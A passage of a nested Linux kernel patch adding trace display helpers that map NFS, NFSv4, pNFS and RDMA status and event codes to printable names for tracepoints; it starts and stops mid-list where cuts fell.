++		{ LOOKUP_NO_SYMLINKS,	"NO_SYMLINKS" }, \
++		{ LOOKUP_NO_MAGICLINKS,	"NO_MAGICLINKS" }, \
++		{ LOOKUP_NO_XDEV,	"NO_XDEV" }, \
++		{ LOOKUP_BENEATH,	"BENEATH" }, \
++		{ LOOKUP_IN_ROOT,	"IN_ROOT" }, \
++		{ LOOKUP_CACHED,	"CACHED" })
+diff --git a/include/trace/misc/nfs.h b/include/trace/misc/nfs.h
+new file mode 100644
+index 0000000000000..0d9d48dca38a8
+--- /dev/null
++++ b/include/trace/misc/nfs.h
+@@ -0,0 +1,387 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Display helpers for NFS protocol elements
++ *
++ * Author: Chuck Lever <chuck.lever@oracle.com>
++ *
++ * Copyright (c) 2020, Oracle and/or its affiliates.
++ */
++
++#include <linux/nfs.h>
++#include <linux/nfs4.h>
++#include <uapi/linux/nfs.h>
++
++TRACE_DEFINE_ENUM(NFS_OK);
++TRACE_DEFINE_ENUM(NFSERR_PERM);
++TRACE_DEFINE_ENUM(NFSERR_NOENT);
++TRACE_DEFINE_ENUM(NFSERR_IO);
++TRACE_DEFINE_ENUM(NFSERR_NXIO);
++TRACE_DEFINE_ENUM(NFSERR_EAGAIN);
++TRACE_DEFINE_ENUM(NFSERR_ACCES);
++TRACE_DEFINE_ENUM(NFSERR_EXIST);
++TRACE_DEFINE_ENUM(NFSERR_XDEV);
++TRACE_DEFINE_ENUM(NFSERR_NODEV);
++TRACE_DEFINE_ENUM(NFSERR_NOTDIR);
++TRACE_DEFINE_ENUM(NFSERR_ISDIR);
++TRACE_DEFINE_ENUM(NFSERR_INVAL);
++TRACE_DEFINE_ENUM(NFSERR_FBIG);
++TRACE_DEFINE_ENUM(NFSERR_NOSPC);
++TRACE_DEFINE_ENUM(NFSERR_ROFS);
++TRACE_DEFINE_ENUM(NFSERR_MLINK);
++TRACE_DEFINE_ENUM(NFSERR_OPNOTSUPP);
++TRACE_DEFINE_ENUM(NFSERR_NAMETOOLONG);
++TRACE_DEFINE_ENUM(NFSERR_NOTEMPTY);
++TRACE_DEFINE_ENUM(NFSERR_DQUOT);
++TRACE_DEFINE_ENUM(NFSERR_STALE);
++TRACE_DEFINE_ENUM(NFSERR_REMOTE);
++TRACE_DEFINE_ENUM(NFSERR_WFLUSH);
++TRACE_DEFINE_ENUM(NFSERR_BADHANDLE);
++TRACE_DEFINE_ENUM(NFSERR_NOT_SYNC);
++TRACE_DEFINE_ENUM(NFSERR_BAD_COOKIE);
++TRACE_DEFINE_ENUM(NFSERR_NOTSUPP);
++TRACE_DEFINE_ENUM(NFSERR_TOOSMALL);
++TRACE_DEFINE_ENUM(NFSERR_SERVERFAULT);
++TRACE_DEFINE_ENUM(NFSERR_BADTYPE);
++TRACE_DEFINE_ENUM(NFSERR_JUKEBOX);
++
++#define show_nfs_status(x) \
++	__print_symbolic(x, \
++		{ NFS_OK,			"OK" }, \
++		{ NFSERR_PERM,			"PERM" }, \
++		{ NFSERR_NOENT,			"NOENT" }, \
++		{ NFSERR_IO,			"IO" }, \
++		{ NFSERR_NXIO,			"NXIO" }, \
++		{ ECHILD,			"CHILD" }, \
++		{ NFSERR_EAGAIN,		"AGAIN" }, \
++		{ NFSERR_ACCES,			"ACCES" }, \
++		{ NFSERR_EXIST,			"EXIST" }, \
++		{ NFSERR_XDEV,			"XDEV" }, \
++		{ NFSERR_NODEV,			"NODEV" }, \
++		{ NFSERR_NOTDIR,		"NOTDIR" }, \
++		{ NFSERR_ISDIR,			"ISDIR" }, \
++		{ NFSERR_INVAL,			"INVAL" }, \
++		{ NFSERR_FBIG,			"FBIG" }, \
++		{ NFSERR_NOSPC,			"NOSPC" }, \
++		{ NFSERR_ROFS,			"ROFS" }, \
++		{ NFSERR_MLINK,			"MLINK" }, \
++		{ NFSERR_OPNOTSUPP,		"OPNOTSUPP" }, \
++		{ NFSERR_NAMETOOLONG,		"NAMETOOLONG" }, \
++		{ NFSERR_NOTEMPTY,		"NOTEMPTY" }, \
++		{ NFSERR_DQUOT,			"DQUOT" }, \
++		{ NFSERR_STALE,			"STALE" }, \
++		{ NFSERR_REMOTE,		"REMOTE" }, \
++		{ NFSERR_WFLUSH,		"WFLUSH" }, \
++		{ NFSERR_BADHANDLE,		"BADHANDLE" }, \
++		{ NFSERR_NOT_SYNC,		"NOTSYNC" }, \
++		{ NFSERR_BAD_COOKIE,		"BADCOOKIE" }, \
++		{ NFSERR_NOTSUPP,		"NOTSUPP" }, \
++		{ NFSERR_TOOSMALL,		"TOOSMALL" }, \
++		{ NFSERR_SERVERFAULT,		"REMOTEIO" }, \
++		{ NFSERR_BADTYPE,		"BADTYPE" }, \
++		{ NFSERR_JUKEBOX,		"JUKEBOX" })
++
++TRACE_DEFINE_ENUM(NFS_UNSTABLE);
++TRACE_DEFINE_ENUM(NFS_DATA_SYNC);
++TRACE_DEFINE_ENUM(NFS_FILE_SYNC);
++
++#define show_nfs_stable_how(x) \
++	__print_symbolic(x, \
++		{ NFS_UNSTABLE,			"UNSTABLE" }, \
++		{ NFS_DATA_SYNC,		"DATA_SYNC" }, \
++		{ NFS_FILE_SYNC,		"FILE_SYNC" })
++
++TRACE_DEFINE_ENUM(NFS4_OK);
++TRACE_DEFINE_ENUM(NFS4ERR_ACCESS);
++TRACE_DEFINE_ENUM(NFS4ERR_ATTRNOTSUPP);
++TRACE_DEFINE_ENUM(NFS4ERR_ADMIN_REVOKED);
++TRACE_DEFINE_ENUM(NFS4ERR_BACK_CHAN_BUSY);
++TRACE_DEFINE_ENUM(NFS4ERR_BADCHAR);
++TRACE_DEFINE_ENUM(NFS4ERR_BADHANDLE);
++TRACE_DEFINE_ENUM(NFS4ERR_BADIOMODE);
++TRACE_DEFINE_ENUM(NFS4ERR_BADLAYOUT);
++TRACE_DEFINE_ENUM(NFS4ERR_BADLABEL);
++TRACE_DEFINE_ENUM(NFS4ERR_BADNAME);
++TRACE_DEFINE_ENUM(NFS4ERR_BADOWNER);
++TRACE_DEFINE_ENUM(NFS4ERR_BADSESSION);
++TRACE_DEFINE_ENUM(NFS4ERR_BADSLOT);
++TRACE_DEFINE_ENUM(NFS4ERR_BADTYPE);
++TRACE_DEFINE_ENUM(NFS4ERR_BADXDR);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_COOKIE);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_HIGH_SLOT);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_RANGE);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_SEQID);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_SESSION_DIGEST);
++TRACE_DEFINE_ENUM(NFS4ERR_BAD_STATEID);
++TRACE_DEFINE_ENUM(NFS4ERR_CB_PATH_DOWN);
++TRACE_DEFINE_ENUM(NFS4ERR_CLID_INUSE);
++TRACE_DEFINE_ENUM(NFS4ERR_CLIENTID_BUSY);
++TRACE_DEFINE_ENUM(NFS4ERR_COMPLETE_ALREADY);
++TRACE_DEFINE_ENUM(NFS4ERR_CONN_NOT_BOUND_TO_SESSION);
++TRACE_DEFINE_ENUM(NFS4ERR_DEADLOCK);
++TRACE_DEFINE_ENUM(NFS4ERR_DEADSESSION);
++TRACE_DEFINE_ENUM(NFS4ERR_DELAY);
++TRACE_DEFINE_ENUM(NFS4ERR_DELEG_ALREADY_WANTED);
++TRACE_DEFINE_ENUM(NFS4ERR_DELEG_REVOKED);
++TRACE_DEFINE_ENUM(NFS4ERR_DENIED);
++TRACE_DEFINE_ENUM(NFS4ERR_DIRDELEG_UNAVAIL);
++TRACE_DEFINE_ENUM(NFS4ERR_DQUOT);
++TRACE_DEFINE_ENUM(NFS4ERR_ENCR_ALG_UNSUPP);
++TRACE_DEFINE_ENUM(NFS4ERR_EXIST);
++TRACE_DEFINE_ENUM(NFS4ERR_EXPIRED);
++TRACE_DEFINE_ENUM(NFS4ERR_FBIG);
++TRACE_DEFINE_ENUM(NFS4ERR_FHEXPIRED);
++TRACE_DEFINE_ENUM(NFS4ERR_FILE_OPEN);
++TRACE_DEFINE_ENUM(NFS4ERR_GRACE);
++TRACE_DEFINE_ENUM(NFS4ERR_HASH_ALG_UNSUPP);
++TRACE_DEFINE_ENUM(NFS4ERR_INVAL);
++TRACE_DEFINE_ENUM(NFS4ERR_IO);
++TRACE_DEFINE_ENUM(NFS4ERR_ISDIR);
++TRACE_DEFINE_ENUM(NFS4ERR_LAYOUTTRYLATER);
++TRACE_DEFINE_ENUM(NFS4ERR_LAYOUTUNAVAILABLE);
++TRACE_DEFINE_ENUM(NFS4ERR_LEASE_MOVED);
++TRACE_DEFINE_ENUM(NFS4ERR_LOCKED);
++TRACE_DEFINE_ENUM(NFS4ERR_LOCKS_HELD);
++TRACE_DEFINE_ENUM(NFS4ERR_LOCK_RANGE);
++TRACE_DEFINE_ENUM(NFS4ERR_MINOR_VERS_MISMATCH);
++TRACE_DEFINE_ENUM(NFS4ERR_MLINK);
++TRACE_DEFINE_ENUM(NFS4ERR_MOVED);
++TRACE_DEFINE_ENUM(NFS4ERR_NAMETOOLONG);
++TRACE_DEFINE_ENUM(NFS4ERR_NOENT);
++TRACE_DEFINE_ENUM(NFS4ERR_NOFILEHANDLE);
++TRACE_DEFINE_ENUM(NFS4ERR_NOMATCHING_LAYOUT);
++TRACE_DEFINE_ENUM(NFS4ERR_NOSPC);
++TRACE_DEFINE_ENUM(NFS4ERR_NOTDIR);
++TRACE_DEFINE_ENUM(NFS4ERR_NOTEMPTY);
++TRACE_DEFINE_ENUM(NFS4ERR_NOTSUPP);
++TRACE_DEFINE_ENUM(NFS4ERR_NOT_ONLY_OP);
++TRACE_DEFINE_ENUM(NFS4ERR_NOT_SAME);
++TRACE_DEFINE_ENUM(NFS4ERR_NO_GRACE);
++TRACE_DEFINE_ENUM(NFS4ERR_NXIO);
++TRACE_DEFINE_ENUM(NFS4ERR_OLD_STATEID);
++TRACE_DEFINE_ENUM(NFS4ERR_OPENMODE);
++TRACE_DEFINE_ENUM(NFS4ERR_OP_ILLEGAL);
++TRACE_DEFINE_ENUM(NFS4ERR_OP_NOT_IN_SESSION);
++TRACE_DEFINE_ENUM(NFS4ERR_PERM);
++TRACE_DEFINE_ENUM(NFS4ERR_PNFS_IO_HOLE);
++TRACE_DEFINE_ENUM(NFS4ERR_PNFS_NO_LAYOUT);
++TRACE_DEFINE_ENUM(NFS4ERR_RECALLCONFLICT);
++TRACE_DEFINE_ENUM(NFS4ERR_RECLAIM_BAD);
++TRACE_DEFINE_ENUM(NFS4ERR_RECLAIM_CONFLICT);
++TRACE_DEFINE_ENUM(NFS4ERR_REJECT_DELEG);
++TRACE_DEFINE_ENUM(NFS4ERR_REP_TOO_BIG);
++TRACE_DEFINE_ENUM(NFS4ERR_REP_TOO_BIG_TO_CACHE);
++TRACE_DEFINE_ENUM(NFS4ERR_REQ_TOO_BIG);
++TRACE_DEFINE_ENUM(NFS4ERR_RESOURCE);
++TRACE_DEFINE_ENUM(NFS4ERR_RESTOREFH);
++TRACE_DEFINE_ENUM(NFS4ERR_RETRY_UNCACHED_REP);
++TRACE_DEFINE_ENUM(NFS4ERR_RETURNCONFLICT);
++TRACE_DEFINE_ENUM(NFS4ERR_ROFS);
++TRACE_DEFINE_ENUM(NFS4ERR_SAME);
++TRACE_DEFINE_ENUM(NFS4ERR_SHARE_DENIED);
++TRACE_DEFINE_ENUM(NFS4ERR_SEQUENCE_POS);
++TRACE_DEFINE_ENUM(NFS4ERR_SEQ_FALSE_RETRY);
++TRACE_DEFINE_ENUM(NFS4ERR_SEQ_MISORDERED);
++TRACE_DEFINE_ENUM(NFS4ERR_SERVERFAULT);
++TRACE_DEFINE_ENUM(NFS4ERR_STALE);
++TRACE_DEFINE_ENUM(NFS4ERR_STALE_CLIENTID);
++TRACE_DEFINE_ENUM(NFS4ERR_STALE_STATEID);
++TRACE_DEFINE_ENUM(NFS4ERR_SYMLINK);
++TRACE_DEFINE_ENUM(NFS4ERR_TOOSMALL);
++TRACE_DEFINE_ENUM(NFS4ERR_TOO_MANY_OPS);
++TRACE_DEFINE_ENUM(NFS4ERR_UNKNOWN_LAYOUTTYPE);
++TRACE_DEFINE_ENUM(NFS4ERR_UNSAFE_COMPOUND);
++TRACE_DEFINE_ENUM(NFS4ERR_WRONGSEC);
++TRACE_DEFINE_ENUM(NFS4ERR_WRONG_CRED);
++TRACE_DEFINE_ENUM(NFS4ERR_WRONG_TYPE);
++TRACE_DEFINE_ENUM(NFS4ERR_XDEV);
++
++TRACE_DEFINE_ENUM(NFS4ERR_RESET_TO_MDS);
++TRACE_DEFINE_ENUM(NFS4ERR_RESET_TO_PNFS);
++
++#define show_nfs4_status(x) \
++	__print_symbolic(x, \
++		{ NFS4_OK,			"OK" }, \
++		{ EPERM,			"EPERM" }, \
++		{ ENOENT,			"ENOENT" }, \
++		{ EIO,				"EIO" }, \
++		{ ENXIO,			"ENXIO" }, \
++		{ EACCES,			"EACCES" }, \
++		{ EEXIST,			"EEXIST" }, \
++		{ EXDEV,			"EXDEV" }, \
++		{ ENOTDIR,			"ENOTDIR" }, \
++		{ EISDIR,			"EISDIR" }, \
++		{ EFBIG,			"EFBIG" }, \
++		{ ENOSPC,			"ENOSPC" }, \
++		{ EROFS,			"EROFS" }, \
++		{ EMLINK,			"EMLINK" }, \
++		{ ENAMETOOLONG,			"ENAMETOOLONG" }, \
++		{ ENOTEMPTY,			"ENOTEMPTY" }, \
++		{ EDQUOT,			"EDQUOT" }, \
++		{ ESTALE,			"ESTALE" }, \
++		{ EBADHANDLE,			"EBADHANDLE" }, \
++		{ EBADCOOKIE,			"EBADCOOKIE" }, \
++		{ ENOTSUPP,			"ENOTSUPP" }, \
++		{ ETOOSMALL,			"ETOOSMALL" }, \
++		{ EREMOTEIO,			"EREMOTEIO" }, \
++		{ EBADTYPE,			"EBADTYPE" }, \
++		{ EAGAIN,			"EAGAIN" }, \
++		{ ELOOP,			"ELOOP" }, \
++		{ EOPNOTSUPP,			"EOPNOTSUPP" }, \
++		{ EDEADLK,			"EDEADLK" }, \
++		{ ENOMEM,			"ENOMEM" }, \
++		{ EKEYEXPIRED,			"EKEYEXPIRED" }, \
++		{ ETIMEDOUT,			"ETIMEDOUT" }, \
++		{ ERESTARTSYS,			"ERESTARTSYS" }, \
++		{ ECONNREFUSED,			"ECONNREFUSED" }, \
++		{ ECONNRESET,			"ECONNRESET" }, \
++		{ ENETUNREACH,			"ENETUNREACH" }, \
++		{ EHOSTUNREACH,			"EHOSTUNREACH" }, \
++		{ EHOSTDOWN,			"EHOSTDOWN" }, \
++		{ EPIPE,			"EPIPE" }, \
++		{ EPFNOSUPPORT,			"EPFNOSUPPORT" }, \
++		{ EPROTONOSUPPORT,		"EPROTONOSUPPORT" }, \
++		{ NFS4ERR_ACCESS,		"ACCESS" }, \
++		{ NFS4ERR_ATTRNOTSUPP,		"ATTRNOTSUPP" }, \
++		{ NFS4ERR_ADMIN_REVOKED,	"ADMIN_REVOKED" }, \
++		{ NFS4ERR_BACK_CHAN_BUSY,	"BACK_CHAN_BUSY" }, \
++		{ NFS4ERR_BADCHAR,		"BADCHAR" }, \
++		{ NFS4ERR_BADHANDLE,		"BADHANDLE" }, \
++		{ NFS4ERR_BADIOMODE,		"BADIOMODE" }, \
++		{ NFS4ERR_BADLAYOUT,		"BADLAYOUT" }, \
++		{ NFS4ERR_BADLABEL,		"BADLABEL" }, \
++		{ NFS4ERR_BADNAME,		"BADNAME" }, \
++		{ NFS4ERR_BADOWNER,		"BADOWNER" }, \
++		{ NFS4ERR_BADSESSION,		"BADSESSION" }, \
++		{ NFS4ERR_BADSLOT,		"BADSLOT" }, \
++		{ NFS4ERR_BADTYPE,		"BADTYPE" }, \
++		{ NFS4ERR_BADXDR,		"BADXDR" }, \
++		{ NFS4ERR_BAD_COOKIE,		"BAD_COOKIE" }, \
++		{ NFS4ERR_BAD_HIGH_SLOT,	"BAD_HIGH_SLOT" }, \
++		{ NFS4ERR_BAD_RANGE,		"BAD_RANGE" }, \
++		{ NFS4ERR_BAD_SEQID,		"BAD_SEQID" }, \
++		{ NFS4ERR_BAD_SESSION_DIGEST,	"BAD_SESSION_DIGEST" }, \
++		{ NFS4ERR_BAD_STATEID,		"BAD_STATEID" }, \
++		{ NFS4ERR_CB_PATH_DOWN,		"CB_PATH_DOWN" }, \
++		{ NFS4ERR_CLID_INUSE,		"CLID_INUSE" }, \
++		{ NFS4ERR_CLIENTID_BUSY,	"CLIENTID_BUSY" }, \
++		{ NFS4ERR_COMPLETE_ALREADY,	"COMPLETE_ALREADY" }, \
++		{ NFS4ERR_CONN_NOT_BOUND_TO_SESSION, "CONN_NOT_BOUND_TO_SESSION" }, \
++		{ NFS4ERR_DEADLOCK,		"DEADLOCK" }, \
++		{ NFS4ERR_DEADSESSION,		"DEAD_SESSION" }, \
++		{ NFS4ERR_DELAY,		"DELAY" }, \
++		{ NFS4ERR_DELEG_ALREADY_WANTED,	"DELEG_ALREADY_WANTED" }, \
++		{ NFS4ERR_DELEG_REVOKED,	"DELEG_REVOKED" }, \
++		{ NFS4ERR_DENIED,		"DENIED" }, \
++		{ NFS4ERR_DIRDELEG_UNAVAIL,	"DIRDELEG_UNAVAIL" }, \
++		{ NFS4ERR_DQUOT,		"DQUOT" }, \
++		{ NFS4ERR_ENCR_ALG_UNSUPP,	"ENCR_ALG_UNSUPP" }, \
++		{ NFS4ERR_EXIST,		"EXIST" }, \
++		{ NFS4ERR_EXPIRED,		"EXPIRED" }, \
++		{ NFS4ERR_FBIG,			"FBIG" }, \
++		{ NFS4ERR_FHEXPIRED,		"FHEXPIRED" }, \
++		{ NFS4ERR_FILE_OPEN,		"FILE_OPEN" }, \
++		{ NFS4ERR_GRACE,		"GRACE" }, \
++		{ NFS4ERR_HASH_ALG_UNSUPP,	"HASH_ALG_UNSUPP" }, \
++		{ NFS4ERR_INVAL,		"INVAL" }, \
++		{ NFS4ERR_IO,			"IO" }, \
++		{ NFS4ERR_ISDIR,		"ISDIR" }, \
++		{ NFS4ERR_LAYOUTTRYLATER,	"LAYOUTTRYLATER" }, \
++		{ NFS4ERR_LAYOUTUNAVAILABLE,	"LAYOUTUNAVAILABLE" }, \
++		{ NFS4ERR_LEASE_MOVED,		"LEASE_MOVED" }, \
++		{ NFS4ERR_LOCKED,		"LOCKED" }, \
++		{ NFS4ERR_LOCKS_HELD,		"LOCKS_HELD" }, \
++		{ NFS4ERR_LOCK_RANGE,		"LOCK_RANGE" }, \
++		{ NFS4ERR_MINOR_VERS_MISMATCH,	"MINOR_VERS_MISMATCH" }, \
++		{ NFS4ERR_MLINK,		"MLINK" }, \
++		{ NFS4ERR_MOVED,		"MOVED" }, \
++		{ NFS4ERR_NAMETOOLONG,		"NAMETOOLONG" }, \
++		{ NFS4ERR_NOENT,		"NOENT" }, \
++		{ NFS4ERR_NOFILEHANDLE,		"NOFILEHANDLE" }, \
++		{ NFS4ERR_NOMATCHING_LAYOUT,	"NOMATCHING_LAYOUT" }, \
++		{ NFS4ERR_NOSPC,		"NOSPC" }, \
++		{ NFS4ERR_NOTDIR,		"NOTDIR" }, \
++		{ NFS4ERR_NOTEMPTY,		"NOTEMPTY" }, \
++		{ NFS4ERR_NOTSUPP,		"NOTSUPP" }, \
++		{ NFS4ERR_NOT_ONLY_OP,		"NOT_ONLY_OP" }, \
++		{ NFS4ERR_NOT_SAME,		"NOT_SAME" }, \
++		{ NFS4ERR_NO_GRACE,		"NO_GRACE" }, \
++		{ NFS4ERR_NXIO,			"NXIO" }, \
++		{ NFS4ERR_OLD_STATEID,		"OLD_STATEID" }, \
++		{ NFS4ERR_OPENMODE,		"OPENMODE" }, \
++		{ NFS4ERR_OP_ILLEGAL,		"OP_ILLEGAL" }, \
++		{ NFS4ERR_OP_NOT_IN_SESSION,	"OP_NOT_IN_SESSION" }, \
++		{ NFS4ERR_PERM,			"PERM" }, \
++		{ NFS4ERR_PNFS_IO_HOLE,		"PNFS_IO_HOLE" }, \
++		{ NFS4ERR_PNFS_NO_LAYOUT,	"PNFS_NO_LAYOUT" }, \
++		{ NFS4ERR_RECALLCONFLICT,	"RECALLCONFLICT" }, \
++		{ NFS4ERR_RECLAIM_BAD,		"RECLAIM_BAD" }, \
++		{ NFS4ERR_RECLAIM_CONFLICT,	"RECLAIM_CONFLICT" }, \
++		{ NFS4ERR_REJECT_DELEG,		"REJECT_DELEG" }, \
++		{ NFS4ERR_REP_TOO_BIG,		"REP_TOO_BIG" }, \
++		{ NFS4ERR_REP_TOO_BIG_TO_CACHE,	"REP_TOO_BIG_TO_CACHE" }, \
++		{ NFS4ERR_REQ_TOO_BIG,		"REQ_TOO_BIG" }, \
++		{ NFS4ERR_RESOURCE,		"RESOURCE" }, \
++		{ NFS4ERR_RESTOREFH,		"RESTOREFH" }, \
++		{ NFS4ERR_RETRY_UNCACHED_REP,	"RETRY_UNCACHED_REP" }, \
++		{ NFS4ERR_RETURNCONFLICT,	"RETURNCONFLICT" }, \
++		{ NFS4ERR_ROFS,			"ROFS" }, \
++		{ NFS4ERR_SAME,			"SAME" }, \
++		{ NFS4ERR_SHARE_DENIED,		"SHARE_DENIED" }, \
++		{ NFS4ERR_SEQUENCE_POS,		"SEQUENCE_POS" }, \
++		{ NFS4ERR_SEQ_FALSE_RETRY,	"SEQ_FALSE_RETRY" }, \
++		{ NFS4ERR_SEQ_MISORDERED,	"SEQ_MISORDERED" }, \
++		{ NFS4ERR_SERVERFAULT,		"SERVERFAULT" }, \
++		{ NFS4ERR_STALE,		"STALE" }, \
++		{ NFS4ERR_STALE_CLIENTID,	"STALE_CLIENTID" }, \
++		{ NFS4ERR_STALE_STATEID,	"STALE_STATEID" }, \
++		{ NFS4ERR_SYMLINK,		"SYMLINK" }, \
++		{ NFS4ERR_TOOSMALL,		"TOOSMALL" }, \
++		{ NFS4ERR_TOO_MANY_OPS,		"TOO_MANY_OPS" }, \
++		{ NFS4ERR_UNKNOWN_LAYOUTTYPE,	"UNKNOWN_LAYOUTTYPE" }, \
++		{ NFS4ERR_UNSAFE_COMPOUND,	"UNSAFE_COMPOUND" }, \
++		{ NFS4ERR_WRONGSEC,		"WRONGSEC" }, \
++		{ NFS4ERR_WRONG_CRED,		"WRONG_CRED" }, \
++		{ NFS4ERR_WRONG_TYPE,		"WRONG_TYPE" }, \
++		{ NFS4ERR_XDEV,			"XDEV" }, \
++		/* ***** Internal to Linux NFS client ***** */ \
++		{ NFS4ERR_RESET_TO_MDS,		"RESET_TO_MDS" }, \
++		{ NFS4ERR_RESET_TO_PNFS,	"RESET_TO_PNFS" })
++
++#define show_nfs4_verifier(x) \
++	__print_hex_str(x, NFS4_VERIFIER_SIZE)
++
++TRACE_DEFINE_ENUM(IOMODE_READ);
++TRACE_DEFINE_ENUM(IOMODE_RW);
++TRACE_DEFINE_ENUM(IOMODE_ANY);
++
++#define show_pnfs_layout_iomode(x) \
++	__print_symbolic(x, \
++		{ IOMODE_READ,			"READ" }, \
++		{ IOMODE_RW,			"RW" }, \
++		{ IOMODE_ANY,			"ANY" })
++
++#define show_rca_mask(x) \
++	__print_flags(x, "|", \
++		{ BIT(RCA4_TYPE_MASK_RDATA_DLG),	"RDATA_DLG" }, \
++		{ BIT(RCA4_TYPE_MASK_WDATA_DLG),	"WDATA_DLG" }, \
++		{ BIT(RCA4_TYPE_MASK_DIR_DLG),		"DIR_DLG" }, \
++		{ BIT(RCA4_TYPE_MASK_FILE_LAYOUT),	"FILE_LAYOUT" }, \
++		{ BIT(RCA4_TYPE_MASK_BLK_LAYOUT),	"BLK_LAYOUT" }, \
++		{ BIT(RCA4_TYPE_MASK_OBJ_LAYOUT_MIN),	"OBJ_LAYOUT_MIN" }, \
++		{ BIT(RCA4_TYPE_MASK_OBJ_LAYOUT_MAX),	"OBJ_LAYOUT_MAX" }, \
++		{ BIT(RCA4_TYPE_MASK_OTHER_LAYOUT_MIN),	"OTHER_LAYOUT_MIN" }, \
++		{ BIT(RCA4_TYPE_MASK_OTHER_LAYOUT_MAX),	"OTHER_LAYOUT_MAX" })
++
++#define show_nfs4_seq4_status(x) \
++	__print_flags(x, "|", \
++		{ SEQ4_STATUS_CB_PATH_DOWN,		"CB_PATH_DOWN" }, \
++		{ SEQ4_STATUS_CB_GSS_CONTEXTS_EXPIRING,	"CB_GSS_CONTEXTS_EXPIRING" }, \
++		{ SEQ4_STATUS_CB_GSS_CONTEXTS_EXPIRED,	"CB_GSS_CONTEXTS_EXPIRED" }, \
++		{ SEQ4_STATUS_EXPIRED_ALL_STATE_REVOKED, "EXPIRED_ALL_STATE_REVOKED" }, \
++		{ SEQ4_STATUS_EXPIRED_SOME_STATE_REVOKED, "EXPIRED_SOME_STATE_REVOKED" }, \
++		{ SEQ4_STATUS_ADMIN_STATE_REVOKED,	"ADMIN_STATE_REVOKED" }, \
++		{ SEQ4_STATUS_RECALLABLE_STATE_REVOKED,	"RECALLABLE_STATE_REVOKED" }, \
++		{ SEQ4_STATUS_LEASE_MOVED,		"LEASE_MOVED" }, \
++		{ SEQ4_STATUS_RESTART_RECLAIM_NEEDED,	"RESTART_RECLAIM_NEEDED" }, \
++		{ SEQ4_STATUS_CB_PATH_DOWN_SESSION,	"CB_PATH_DOWN_SESSION" }, \
++		{ SEQ4_STATUS_BACKCHANNEL_FAULT,	"BACKCHANNEL_FAULT" })
+diff --git a/include/trace/misc/rdma.h b/include/trace/misc/rdma.h
+new file mode 100644
+index 0000000000000..81bb454fc2888
+--- /dev/null
++++ b/include/trace/misc/rdma.h
+@@ -0,0 +1,168 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (c) 2017 Oracle.  All rights reserved.
++ */
++
++/*
++ * enum ib_event_type, from include/rdma/ib_verbs.h
++ */
++#define IB_EVENT_LIST				\
++	ib_event(CQ_ERR)			\
++	ib_event(QP_FATAL)			\
++	ib_event(QP_REQ_ERR)			\
++	ib_event(QP_ACCESS_ERR)			\
++	ib_event(COMM_EST)			\
++	ib_event(SQ_DRAINED)			\
++	ib_event(PATH_MIG)			\
++	ib_event(PATH_MIG_ERR)			\
++	ib_event(DEVICE_FATAL)			\
++	ib_event(PORT_ACTIVE)			\
++	ib_event(PORT_ERR)			\
++	ib_event(LID_CHANGE)			\
++	ib_event(PKEY_CHANGE)			\
++	ib_event(SM_CHANGE)			\
++	ib_event(SRQ_ERR)			\
++	ib_event(SRQ_LIMIT_REACHED)		\
++	ib_event(QP_LAST_WQE_REACHED)		\
++	ib_event(CLIENT_REREGISTER)		\
++	ib_event(GID_CHANGE)			\
++	ib_event_end(WQ_FATAL)
++
++#undef ib_event
++#undef ib_event_end
++
++#define ib_event(x)		TRACE_DEFINE_ENUM(IB_EVENT_##x);
++#define ib_event_end(x)		TRACE_DEFINE_ENUM(IB_EVENT_##x);
++
++IB_EVENT_LIST
++
++#undef ib_event
++#undef ib_event_end
++
++#define ib_event(x)		{ IB_EVENT_##x, #x },
++#define ib_event_end(x)		{ IB_EVENT_##x, #x }
++
++#define rdma_show_ib_event(x) \
++		__print_symbolic(x, IB_EVENT_LIST)
++
++/*
++ * enum ib_wc_status, from include/rdma/ib_verbs.h
++ */
++#define IB_WC_STATUS_LIST			\
++	ib_wc_status(SUCCESS)			\
++	ib_wc_status(LOC_LEN_ERR)		\
++	ib_wc_status(LOC_QP_OP_ERR)		\
++	ib_wc_status(LOC_EEC_OP_ERR)		\
++	ib_wc_status(LOC_PROT_ERR)		\
++	ib_wc_status(WR_FLUSH_ERR)		\
++	ib_wc_status(MW_BIND_ERR)		\
++	ib_wc_status(BAD_RESP_ERR)		\
++	ib_wc_status(LOC_ACCESS_ERR)		\
++	ib_wc_status(REM_INV_REQ_ERR)		\
++	ib_wc_status(REM_ACCESS_ERR)		\
++	ib_wc_status(REM_OP_ERR)		\
++	ib_wc_status(RETRY_EXC_ERR)		\
++	ib_wc_status(RNR_RETRY_EXC_ERR)		\
++	ib_wc_status(LOC_RDD_VIOL_ERR)		\
++	ib_wc_status(REM_INV_RD_REQ_ERR)	\
++	ib_wc_status(REM_ABORT_ERR)		\
++	ib_wc_status(INV_EECN_ERR)		\
++	ib_wc_status(INV_EEC_STATE_ERR)		\
++	ib_wc_status(FATAL_ERR)			\
++	ib_wc_status(RESP_TIMEOUT_ERR)		\
++	ib_wc_status_end(GENERAL_ERR)
++
++#undef ib_wc_status
++#undef ib_wc_status_end
++
++#define ib_wc_status(x)		TRACE_DEFINE_ENUM(IB_WC_##x);
++#define ib_wc_status_end(x)	TRACE_DEFINE_ENUM(IB_WC_##x);
++
++IB_WC_STATUS_LIST
++
++#undef ib_wc_status
++#undef ib_wc_status_end
++
++#define ib_wc_status(x)		{ IB_WC_##x, #x },
++#define ib_wc_status_end(x)	{ IB_WC_##x, #x }
++
++#define rdma_show_wc_status(x) \
++		__print_symbolic(x, IB_WC_STATUS_LIST)
++
++/*
++ * enum ib_cm_event_type, from include/rdma/ib_cm.h
++ */
++#define IB_CM_EVENT_LIST			\
++	ib_cm_event(REQ_ERROR)			\
++	ib_cm_event(REQ_RECEIVED)		\
++	ib_cm_event(REP_ERROR)			\
++	ib_cm_event(REP_RECEIVED)		\
++	ib_cm_event(RTU_RECEIVED)		\
++	ib_cm_event(USER_ESTABLISHED)		\
++	ib_cm_event(DREQ_ERROR)			\
++	ib_cm_event(DREQ_RECEIVED)		\
++	ib_cm_event(DREP_RECEIVED)		\
++	ib_cm_event(TIMEWAIT_EXIT)		\
++	ib_cm_event(MRA_RECEIVED)		\
++	ib_cm_event(REJ_RECEIVED)		\
++	ib_cm_event(LAP_ERROR)			\
++	ib_cm_event(LAP_RECEIVED)		\
